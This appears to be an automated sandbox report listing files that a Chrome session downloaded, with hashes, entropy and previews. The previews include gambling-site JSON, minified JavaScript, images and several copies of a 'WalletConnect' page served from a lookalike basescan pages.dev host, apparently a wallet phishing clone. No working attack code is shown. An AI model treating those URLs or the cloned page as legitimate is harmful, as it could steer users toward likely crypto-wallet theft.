                                                                                                                                                                                                                                              Preview:RIFF0...WEBPVP8L$.../..c.M@.$[HT3.x7......!D.......J...9.[KHkJ)c}.*,0...P...........j.. .....'.S.-.@....Fl.E...NpcI.....tLY......`...;..n......s....#hw\P%5.........+.r.>....U..x.5..........4.+....6...m.G..z.........v......t5.-..+..*....h.&.f.AD2..B+.I#....(..`Z..8~.......8..b.R.\Et...1..c......t5.....`...g1.'.}...P-.&.......*5G.../H.c..S.........bt.....W.A.q...R.z....{.....Yc..E...[.A..G...|.B...*K9..GU..=4=/..T.|..{/,/......h..=.K.....^.b.1z...Hb.|..... dE....`@O..E<...?.j.U...>R..".....(RET,..*..5..sl%PH.5.7.!..!<..F...R...jk.7.U*.R...KU..+......A.Ed=..~/x..].Vm+-/6s#..D..p..K(..V.....r-.....x._....p..........[......K......TX.=......A....'.0...`t'.u.=dK....O.0F4....2F.f.O."Bp.0`...4.<2. K,.`..-`....D8....!XBD....h.......#....x..!.....O...9...E....,!q.....xAn....#n.i..f..z.. 2....9..XB.%...q b.....I+\.l....S.@....e...K|........M.'_..%bY.G.X..,...t<.-.......ziR..(..I..00."e.$.c>.......t..K,D....Q$..C.[...".[^..`..Y...1"$BpIh....\...
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):360560
                                                                                                                                                                                                                                              Entropy (8bit):5.2695663477384205
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:ydLeNo5RkgVkBA6R2GbaHe9h/cwSS+/qLpoimmBaYRxaYRgEs860gNbEh6Bm:xuBV42GGHe9h/JFdoimmBaEajzKhem
                                                                                                                                                                                                                                              MD5:982FB13341BA9A8BDF774E62AEB6F2FA
                                                                                                                                                                                                                                              SHA1:9DAC396098B8991EE90F69691CFA64D06CBAFBAF
                                                                                                                                                                                                                                              SHA-256:697EE10495ACF2A5DFB0A18904C0AB51515EFF313F597AA00A8E284CAB319132
                                                                                                                                                                                                                                              SHA-512:9BFDF1087519CC38EF831399F221E0C487AA6B2ECEBAA0EE055B0A498C860419C57AC136C870B1E8CAD1619C1C6025723374DC52954CC079EF84D9BCD14A393F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/cache/game/support/system/conf/
                                                                                                                                                                                                                                              Preview:{"code":0,"msg":null,"data":{"serverTimestemp":1727486208685,"currency":[{"currencyName":"COPFIAT","aliasCurrencyName":"COP","fullName":"Colombian Pesos","unitAmount":100,"withdrawLimitAmount":100,"minFee":100,"maxFee":100,"sort":1,"display":false,"channelName":"BCG","channelCurrencyName":"COPFIAT","precisionUnit":2,"blockExplorer":null,"status":0,"rechargeConfirmTimes":2,"online":true},{"currencyName":"APT","aliasCurrencyName":"APT","fullName":"APT","unitAmount":100000000,"withdrawLimitAmount":200000000,"minFee":1000000,"maxFee":100000000,"sort":1,"display":false,"channelName":"BCG","channelCurrencyName":"APT","precisionUnit":8,"blockExplorer":"https://tracemove.io","status":0,"rechargeConfirmTimes":2,"online":true},{"currencyName":"UAHFIAT","aliasCurrencyName":"UAH","fullName":"Ukrainian Hryvnia","unitAmount":10000,"withdrawLimitAmount":100000,"minFee":10000,"maxFee":10000000,"sort":1,"display":false,"channelName":"BCG","channelCurrencyName":"UAHFIAT","precisionUnit":2,"blockExplorer
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (4413)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):4414
                                                                                                                                                                                                                                              Entropy (8bit):5.323606616610612
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:1JEDIMtf6bq96LSS5XdDnUdxtoGEzi7f/E/v/jmn9UOOLNJcJ+jD:EDd/gOSNdDUdvdn7f8Hbm9gNaJKD
                                                                                                                                                                                                                                              MD5:08BF7F3BCC5CDCC1A72C4BCDD6B82FD1
                                                                                                                                                                                                                                              SHA1:A74483B33B91A08E8FE1F860E42C425BF405BAC1
                                                                                                                                                                                                                                              SHA-256:D1905F143F6161EE2803174CC0587F56F9BD00356279CA66B68D7EC7ABD1924E
                                                                                                                                                                                                                                              SHA-512:AA83B38BE6A52E08A237F03C1AAE8FFC4554643E95E4A9DC87F8CC226997298E66F8E39E5391DCC8E078B3250D8AAEC99AF9E3EC0ADC7CFC0881F936B87AC2DF
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:var N=(l,n,e)=>new Promise((s,i)=>{var p=c=>{try{u(e.next(c))}catch(_){i(_)}},m=c=>{try{u(e.throw(c))}catch(_){i(_)}},u=c=>c.done?s(c.value):Promise.resolve(c.value).then(p,m);u((e=e.apply(l,n)).next())});import{c as $}from"./web-13cf6287.js";import{a9 as v,u as C,aa as t,ab as f,p as A,l as h,t as a,a as r,b as d,ac as S,D as y,h as g}from"./manifest-51a3674f.js";import{t as o}from"./i18n-fcfac1d2.js";import{B as R}from"./index-fc48f31f.js";import{R as I}from"./type-bfb25fc4.js";import{x as O,w as T,s as w}from"./solid-js-38561dfe.js";import{b as k}from"./index-adb8672d.js";import{r as b}from"./index-c1634a5e.js";import"./index-3fd48be3.js";import"./animate-number-f0294c10.js";import"./currency-format-1c532f37.js";import"./_baseGetTag-c2e287b9.js";import"./isArray-79a0be9c.js";import"./index-96ed660e.js";import"./http-f4555b94.js";import"./baseService-449c2e3e.js";import"./_baseFor-3fee30d6.js";import"./_MapCache-1fb5cc44.js";const K=()=>{const l=v(),n=O(T(),C);t("regist-invited-prese
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 400x400, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):4356
                                                                                                                                                                                                                                              Entropy (8bit):7.951921111584234
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:Mam1jojJmYwzRPWf5PHvkw50m/dasR0Yp5rWUyn2SZQfXVsHGEVmZo1:9YNPY5tymNR0zn2SZQWGEVv
                                                                                                                                                                                                                                              MD5:2F2CE7CF8A0BA0C81ED375F6B440AF14
                                                                                                                                                                                                                                              SHA1:F16F0BBBEA3022455BC815586B3B8A8B39BE7A74
                                                                                                                                                                                                                                              SHA-256:EBDADCEBE2037CC79664C70717A4E2CBEE3BFE4ABE2E07BB4D9D4FE634D1497F
                                                                                                                                                                                                                                              SHA-512:5AA21C0EA7771E2502CE2EE20A72ABDDD8076BEA4556D243C60919A19100D0E02762CC6034D953E872B9252D861EEBE4BAF45307C0E68483D351649D9D8F0941
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://api.web3modal.com/public/getAssetImage/0c2840c3-5b04-4c44-9661-fbd4b49e1800
                                                                                                                                                                                                                                              Preview:RIFF....WEBPVP8 ....P`...*....>I$.F"."!#RH.P..en._.....[..s......Xc ..~Tm$s.._...?hz.u........_./c.....G...O@.v.............'..OP....?W?..t..........._.?T?.|..W...........i.........o.................?....t. .........(..~-..u..n......~.....>....G...[.F......mm......).q..'\`.^.....X..`,=.S./%m..%$..H..*.Y.....i..^..E.....~=x.c..Z......[kmm.+R2.}.T.>....Ll.[..8....[.^.. ....=]....+.`..%. .2......P.fHq.;..)}.kd...D..u.}...YV..T...h...../s]]..TKm..79...lg>..A..O.[....$c.`.).5.H.....~r...b.q.>.........r...`..F.E._..O.D..a.v#h.R.B.....U....`".f6....w....ub._gA.[..vy..M...S..Y.R.-..5..^..N!.L...Fl4..N..Sc~ ...x8.di.^L.9...1+YN-..S....d|...E0......[.....C.~.k.yB...T.@...Q..7.l.....L..<0y.J...A...Ov..9;...l..._@8.w Y.r.qF...2V.b.7.R.....^...8.J..."^...W\..u....<oc.......\..C..8..p.......P.Mo.."q....@.;a.....6h.ZcQK...4......2?J.FZ...e.......a...x..H.M.D..gP....@D0......B..'&...w-O......@.^.g...Tw..>!A|q-p.f..v./W...d....n. {.;..?NS..1c.M.\3..O..T..._....H.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (38683)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):208394
                                                                                                                                                                                                                                              Entropy (8bit):5.382421705439887
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:Idsnnj+lEo8FX2JKiogBZojytGUgBth17wLmNyfGCT248PfVPv7a1lkggJJKCqZ8:xi+FUbZC170xuS248nVH7aY1iIXaaz
                                                                                                                                                                                                                                              MD5:BEB32C0C7C07CF1A28663DDDEE27D41A
                                                                                                                                                                                                                                              SHA1:692943528800E3E7D42D86F46872D9E2A7C84F1E
                                                                                                                                                                                                                                              SHA-256:8A5F393CA11D19DD3CCFEA8FEDEDAAB6F2E57FF7EF80C4A3CAE98F78B59A171A
                                                                                                                                                                                                                                              SHA-512:8F4AD39652A04E99A7187B80419AAB23156966A231B58C5321FA1ED52E979E92B6EB51FA785181C08A8E79B1A62DDD612F823962BCF4269127BC3975B4EF514F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:(function(T,K){"object"===typeof module&&module.exports?module.exports=T.document?K(T):K:"function"===typeof define&&define.amd?define(function(){return K(T)}):T.Highcharts=K(T)})("undefined"!==typeof window?window:this,function(T){var K=function(){var a="undefined"===typeof T?window:T,C=a.document,E=a.navigator&&a.navigator.userAgent||"",F=C&&C.createElementNS&&!!C.createElementNS("http://www.w3.org/2000/svg","svg").createSVGRect,m=/(edge|msie|trident)/i.test(E)&&!a.opera,h=-1!==E.indexOf("Firefox"),e=-1!==E.indexOf("Chrome"),t=h&&4>parseInt(E.split("Firefox/")[1],10);return a.Highcharts?a.Highcharts.error(16,!0):{product:"Highcharts",version:"6.1.4",deg2rad:2*Math.PI/360,doc:C,hasBidiBug:t,hasTouch:C&&void 0!==C.documentElement.ontouchstart,isMS:m,isWebKit:-1!==E.indexOf("AppleWebKit"),isFirefox:h,isChrome:e,isSafari:!e&&-1!==E.indexOf("Safari"),isTouchDevice:/(Mobile|Android|Windows Phone)/.test(E),SVG_NS:"http://www.w3.org/2000/svg",chartCount:0,seriesTypes:{},symbolSizes:{},svg:F,
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/config.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (472), with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):472
                                                                                                                                                                                                                                              Entropy (8bit):4.633675977921456
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:1rckvFrWn0s0s0s0s0s0s0s0s1PAQUa0m6SfVVVVVVVVmn:hck0AQUav6Sun
                                                                                                                                                                                                                                              MD5:2E928D71E5D08E1EADA15D18FBE83415
                                                                                                                                                                                                                                              SHA1:C12209E2601DF3AF17EBDAF72C736701A07EDDB7
                                                                                                                                                                                                                                              SHA-256:0D7A477A432AA45E80BBFD511A2C675B0978670D97D6C0E13204BCD2E45515F6
                                                                                                                                                                                                                                              SHA-512:C2663EA6C14F2075ECACE46B62B1017E3CE40279747EB525D83866978427054CD2D0BD8AE4732C2226CD2AD171E8750C3521F69B2CC70208F1B0BAF29352725E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISjgEJamGhrYc_kfcSBQ0aaYzfEgUNPR9TPBIFDVqx1xASBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ0x5S_-EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EhcJZYhefQAA49wSBQ0aaYzfEgUNPR9TPBIQCUEJ0hJnBK5aEgUNWrHXEBIzCVoE179YuGNkEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEk8J46cmNQVSPi0SBQ0x5S_-EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_?alt=proto
                                                                                                                                                                                                                                              Preview:CqsBCgcNGmmM3xoACgcNPR9TPBoACgcNWrHXEBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNMeUv/hoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoAChIKBw0aaYzfGgAKBw09H1M8GgAKCQoHDVqx1xAaAAo2CgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACloKBw0x5S/+GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgA=
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/loaderImage.gif
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2315
                                                                                                                                                                                                                                              Entropy (8bit):5.06307085126787
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:t4Lt7AtZYjjLNTQdNt5LFUdNt8LhH7dNtf3LXVqdNtKL3HXqdNtdLcLdNtQL0gdw:+pAvYBTQHuORV3BqIbq78C5VGck
                                                                                                                                                                                                                                              MD5:FF5F58512BDA38BF652FBCAB70E49C7B
                                                                                                                                                                                                                                              SHA1:71D6167817AF2C73F6C669BB649A1B3B1FE31D6E
                                                                                                                                                                                                                                              SHA-256:92E50CEF8222EF06AFFC061AB3BF864B4DA4D6545EA5EA72D046A37B2569BEFB
                                                                                                                                                                                                                                              SHA-512:519715E077BB02B4618435360DF5769E18EAEECCD4737BA85A346E67582C442B79575ECC522DD6D56E386483AE31CC13F650910B7EF08557EBBDBCABEC4B5EA8
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="62" height="62" preserveAspectRatio="xMidYMid" style="background: none;"><rect id="backgroundrect" width="100%" height="100%" x="0" y="0" fill="none" stroke="none"/><g class="currentLayer" style=""><title>Layer 1</title><rect x="0" y="0" width="20" height="20" fill="#1d3f72" id="svg_1" class="">.. <animate attributeName="fill" values="#5699d2;#1d3f72;#1d3f72" keyTimes="0;0.125;1" dur="1.6s" repeatCount="indefinite" begin="0s" calcMode="discrete"/>..</rect><rect x="21" y="0" width="20" height="20" fill="#1d3f72" id="svg_2" class="">.. <animate attributeName="fill" values="#5699d2;#1d3f72;#1d3f72" keyTimes="0;0.125;1" dur="1.6s" repeatCount="indefinite" begin="0.2s" calcMode="discrete"/>..</rect><rect x="42" y="0" width="20" height="20" fill="#1d3f72" id="svg_3" class="">.. <animate attributeName="fill" values="#5699d2;#1d3f72;#1d3f72" keyTimes="0;0.125;1" dur="1.6s" repeatCount="indefinite" begi
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):838
                                                                                                                                                                                                                                              Entropy (8bit):7.715627071075353
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:lo+Ky4iNqGmCxBV8qcBK6UXG1fkzyHYZy:lo+KyZN6+BsBKK1kyUy
                                                                                                                                                                                                                                              MD5:D82A6DAFA02194AF4D26CDF0609ED9F1
                                                                                                                                                                                                                                              SHA1:2FCA03AAF44DB98B2BC2D177147DD1F34168B210
                                                                                                                                                                                                                                              SHA-256:FB8054EFFA5DD883B4DD710E64EF427329F0298EB4B035E49C8F7D7042D8A50B
                                                                                                                                                                                                                                              SHA-512:AA8F3690C6FB7B24AB6B4C78F4159D01475F19F69B286BC042F07206EC177F92DD445805425AAFB1F6B47BBA1A4A41F54DABA03F8C4BC69A7F1C0B29069AD7B5
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/favicon-32x32.png
                                                                                                                                                                                                                                              Preview:RIFF>...WEBPVP8L1.../......&.dQ...{...a.K........_.n#IR..c...x..w.i..B$I.....Y.z..=1L#h.6...?.S.......>..c#G>..)..l....r3....a...^.....-&..&u...J..Z:.D$..0.b..P..e...#...m.lP...a..:..X._;...g| ._.m.]....YR0MX.~.o.!F>.nK....b.MY......{.3....(...<.F.A..`.Q....D..q!..P........A .......H]....u..]:A..D.A......B3.."..._.z].@...$eg...6..k...o3..m..j..}.....a..IM..&....|.b......}<.@.&.....Wb.4!D....T.B../D.....X.....eIr..O..7..L..j{GE..........$'.$.....&...N...$..R./..io.{.&.u.wT....{.I..3..~...R._-...G.._.F.".........W....t.......O#.J>.....(~.^\..*1xO*........A.....v..;)%.4.~G.X..3=...s.....Z.......3...I..&.wji...i..e.~.....V..............v..=Ir...5/...7...<))...pxvam.&..A...tg.L-.m..%.j*.I)i}.|...........5..O.b_8.........mn.K.\."...u.4.....6A.|...T......+..rB..p...)8g.{....G.a.%.y...|a....?.)9....
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 200x267, components 3
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):22013
                                                                                                                                                                                                                                              Entropy (8bit):7.8979684583201575
                                                                                                                                                                                                                                              Encrypted:false
